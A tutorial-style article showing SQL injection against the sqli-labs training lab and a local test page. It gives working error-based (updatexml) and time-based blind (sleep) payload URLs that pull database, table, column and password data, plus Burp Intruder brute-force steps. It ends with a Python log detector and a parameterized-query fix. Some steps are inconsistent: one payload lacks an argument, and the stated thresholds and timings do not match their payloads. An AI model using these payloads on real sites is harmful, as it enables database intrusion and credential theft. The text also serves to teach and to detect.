SQL injection vulnerabilities: error-based injection and blind injection

2025-02-23 Update From: SLTechnology News&Howtos

Shulou (Shulou.com) 06/01

Today I will talk about how error-based injection and blind injection work against SQL injection vulnerabilities. Many people may not know much about them, so the editor has summarized the following content. I hope you get something out of this article.

Environment: the first level of sqli (Less-1), and szx.php

First, error-based injection

1. Get the database name. Obtain different database names by modifying the value after limit.

http://192.168.1.129/sqli/Less-1/?id=1' and updatexml(1,(select concat(0x7e,(schema_name),0x7e) FROM information_schema.schemata limit 2),1)--+

2. Get the tables in the database. Specify the database name, and obtain different table names by modifying the value after limit.

http://127.0.0.1/sqli/Less-1/?id=1' and updatexml(1,(select concat(0x7e,(table_name),0x7e) from information_schema.tables where table_schema='jay' limit 2),1)--+

3. Get the table fields. Specify the table name, converted to hexadecimal form, and obtain different table fields by modifying the value after limit.

http://192.168.1.129/sqli/Less-1/?id=1' and updatexml(1,(select concat(0x7e,(column_name),0x7e) from information_schema.columns where table_name=0x75736572 limit 1),1)--+

4. Get the field content. Specify the field, the database and the table name, and obtain different field contents by modifying the value after limit.

http://192.168.1.129/sqli/Less-1/?id=1' and updatexml(1,(select concat(0x7e,pass,0x7e) from jay.user limit 1),1)--+

Second, blind injection

1. Get the length of the database name. If the length is greater than or equal to 2, wait 5 seconds, and if it is less than 2, do nothing. Modify this value to determine the length.

http://192.168.1.129/php/szx.php?id=1 and (select(if(length(database())>2,sleep(5),null))) #

2. Get the database name

If the first character from the left of the database name is 'j', wait one second; if not, wait 5 seconds. Modify the character to determine the database name.

http://192.168.1.129/php/szx.php?id=1 and if(left(database(),1)='j',1,sleep(5))

If the ASCII code of the first character from the left of the database name is 106, which is 'j', wait one second; if not, wait 5 seconds. Modify the value to determine the database name.

http://192.168.1.129/php/szx.php?id=1 and if(ascii(substr(database(),1,1))=106,sleep(1))

3. Burp Suite detection (blind injection)

1. Capture the request, send it to the Intruder module, and set the variable.

2. In the payload settings, set a-z, that is ASCII 97-122, and set the step size to 1.

3. Start the attack. Only 106 has a time of 2000; the others take more than 5000, indicating that the ASCII code of the first character is 106. Repeat in the same way to obtain the characters at the other positions.
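Seen from the defender's side, the requests above leave recognizable traces in web server logs. The following Python sketch is an added example, not part of the original article: it flags the error-based and time-based patterns shown here in a constructed access log, and marks a sleep() request as executed when the response time is at least the requested delay. The log tuple format, the client addresses and all function names are assumptions.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Patterns taken from the requests in this article (matched on decoded, lower-cased queries).
RULES = {
    "error-based": re.compile(r"\bupdatexml\s*\("),
    "schema-enum": re.compile(r"\binformation_schema\s*\."),
    "time-based": re.compile(r"\bsleep\s*\(\s*\d+"),
    "char-probe": re.compile(r"\b(?:ascii|substr|left|length)\s*\(.*\bdatabase\s*\("),
}
SLEEP_ARG = re.compile(r"\bsleep\s*\(\s*(\d+)")

def normalize(target):
    """URL-decode the query string, lower-case it and collapse whitespace."""
    query = unquote_plus(urlsplit(target).query).lower()
    return re.sub(r"\s+", " ", query)

def classify(target):
    """Return the set of rule names that match the request's query string."""
    query = normalize(target)
    return {name for name, rx in RULES.items() if rx.search(query)}

def payload_executed(target, elapsed_ms):
    """True when a sleep(N) request took at least N seconds, i.e. the database ran it."""
    m = SLEEP_ARG.search(normalize(target))
    return bool(m) and elapsed_ms >= int(m.group(1)) * 1000

def triage(log):
    """Summarise flagged requests per client: matched rules, hit count, confirmed execution."""
    report = {}
    for client, target, elapsed_ms in log:
        labels = classify(target)
        if labels:
            entry = report.setdefault(client, {"labels": set(), "hits": 0, "executed": False})
            entry["labels"] |= labels
            entry["hits"] += 1
            entry["executed"] |= payload_executed(target, elapsed_ms)
    return report

# Constructed sample: (client, request target, response time in ms).
SAMPLE_LOG = [
    ("10.0.0.5", "/sqli/Less-1/?id=1", 14),
    ("10.0.0.9", "/sqli/Less-1/?id=1%27%20and%20updatexml(1,(select%20concat(0x7e,(schema_name),"
                 "0x7e)%20FROM%20information_schema.schemata%20limit%202),1)--+", 21),
    ("10.0.0.9", "/php/szx.php?id=1%20and%20If(left(database(),1)=%27a%27,1,sleep(5))", 5013),
    ("10.0.0.9", "/php/szx.php?id=1%20and%20If(left(database(),1)=%27j%27,1,sleep(5))", 18),
]

if __name__ == "__main__":
    for client, entry in triage(SAMPLE_LOG).items():
        print(client, sorted(entry["labels"]), entry["hits"], entry["executed"])
```

A client whose sleep() requests really are delayed shows that the parameter reaches the SQL statement unescaped; the application-side fix is to bind the id value through a parameterized query instead of concatenating it into the statement.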

After reading the above, do you have a better understanding of SQL injection vulnerabilities, error-based injection and blind injection? If you want to learn more, please follow the industry information channel. Thank you for your support.
